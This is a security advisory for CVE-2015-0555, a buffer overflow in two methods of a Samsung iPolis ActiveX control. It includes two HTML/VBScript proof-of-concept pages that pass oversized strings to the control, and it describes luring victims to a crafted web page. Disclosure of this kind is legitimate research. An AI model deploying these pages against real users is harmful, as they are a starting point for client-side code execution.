CVE-2015-0555

Introduction
*************************************************************

There is a Buffer Overflow Vulnerability which leads to Remote Code
Execution.
Vulnerability is due to input validation to the API ReadConfigValue and
WriteConfigValue API's in XnsSdkDeviceIpInstaller.ocx

This is different from CVE-2014-3911 as the version of iPolis 1.12.2
(latest as of 12/12/2014).
CVE-2014-3911 is related to different ActiveX and on older iPolis version

Discovery MEthod: Fuzzing
Exploiting: It is a client side attack where attacker can host a crafted
HTML web page with malicious payload and entice the victim to browse to the
hosted page to compromise the victim.

Operating System: Windows 7 Ultimate N SP1

*************************************************************
Vulnerability1:
*Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_ReadConfigValue_RemoteCodeExecution*
******************Proof of Concept (PoC)**************8
</html>
<head> Samsung iPolis 1.12.x XnsSdkDeviceIpInstaller.ocx ReadConfigValue()
Remote Code Execution</head>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target' />
<script language='vbscript'>

targetFile = "C:\Program Files\Samsung\iPOLiS Device
Manager\XnsSdkDeviceIpInstaller.ocx"
prototype  = "Function ReadConfigValue ( ByVal szKey As String ) As String"
memberName = "ReadConfigValue"
progid     = "XNSSDKDEVICELib.XnsSdkDevice"
argCount   = 1

arg1=String(1044, "A")

target.ReadConfigValue arg1

</script>
</html>


*****************************************************************************************
*Vulnerability2: *
*Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_WriteConfigValue_RemoteCodeExecution
*

*******************Proof of Concept (PoC)*********************

<html>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target' />
<script language='vbscript'>

targetFile = "C:\Program Files\Samsung\iPOLiS Device
Manager\XnsSdkDeviceIpInstaller.ocx"
prototype  = "Function WriteConfigValue ( ByVal szKey As String ,  ByVal
szValue As String ) As Long"
memberName = "WriteConfigValue"
progid     = "XNSSDKDEVICELib.XnsSdkDevice"
argCount   = 2

arg1=String(14356, "A")
arg2="defaultV"

target.WriteConfigValue arg1 ,arg2

</script></job></package>
</html>
****************************************************************************

CERT contacted Samsung but there wasn't any response from Samsung.
Refer http://blog.disects.com for more details

Best Regards,
Praveen Darshanam